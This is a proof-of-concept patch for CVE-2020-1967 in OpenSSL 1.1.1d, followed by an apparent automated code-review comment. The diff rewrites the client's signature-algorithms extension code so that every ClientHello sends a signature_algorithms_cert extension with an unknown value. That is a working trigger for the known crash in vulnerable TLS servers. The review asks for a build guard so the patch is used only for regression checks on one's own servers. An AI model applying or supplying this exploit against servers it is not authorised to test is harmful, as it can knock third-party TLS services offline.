POC / CVE-2020-1967.patch PATCH
*** openssl-1.1.1d/ssl/statem/extensions_clnt.c	Tue Sep 10 13:13:07 2019
--- openssl-1.1.1d-patched/ssl/statem/extensions_clnt.c	Tue Apr 28 21:11:20 2020
*************** EXT_RETURN tls_construct_ctos_sig_algs(S
*** 272,277 ****
--- 272,300 ----
          return EXT_RETURN_NOT_SENT;
  
      salglen = tls12_get_psigalgs(s, 1, &salg);
+ 
+ 
+ /*
+ // signature_algorithms_cert
+ */
+     const uint16_t non_existent = 0x1234;
+     fprintf(stderr,"Sending CVE-2020-1967 payload\n");
+     if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms_cert)
+                // Sub-packet for sig-algs extension
+             || !WPACKET_start_sub_packet_u16(pkt)
+                // Sub-packet for the actual list 
+             || !WPACKET_start_sub_packet_u16(pkt)
+             || (!WPACKET_put_bytes_u16(pkt, non_existent))
+             || !WPACKET_close(pkt)
+             || !WPACKET_close(pkt)) {
+         SSLfatal(s, SSL_AD_INTERNAL_ERROR, SSL_F_TLS_CONSTRUCT_CTOS_SIG_ALGS,
+                  ERR_R_INTERNAL_ERROR);
+         return EXT_RETURN_FAIL;
+     }
+ 
+ /*
+ // original signature_algorithms:
+ */
      if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
                 /* Sub-packet for sig-algs extension */
              || !WPACKET_start_sub_packet_u16(pkt)
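Review bot: The added signature_algorithms_cert block runs unconditionally, so every ClientHello built with this patched libssl carries the unknown value `0x1234` and the library writes to stderr on each handshake; a build meant only for checking whether a server you operate still mishandles the extension should not be usable as an ordinary client by accident. Wrap the block in a build-time guard such as `#ifdef SIGALGS_CERT_REGRESSION_TEST` ... `#endif` (macro name constructed for this note) and put the `fprintf` under the same guard. The declaration `const uint16_t non_existent = 0x1234;` sits after executable statements, which OpenSSL's C style appears to avoid; give it its own braced scope and a comment such as `/* deliberately not a known signature scheme; a correct peer ignores it */`. The `/* // ... */` markers mix two comment styles and can be plain `/* ... */` like the unchanged lines below them. tls_construct_ctos_sig_algs starts before and continues past this hunk, so the rest of the function is not reviewed here.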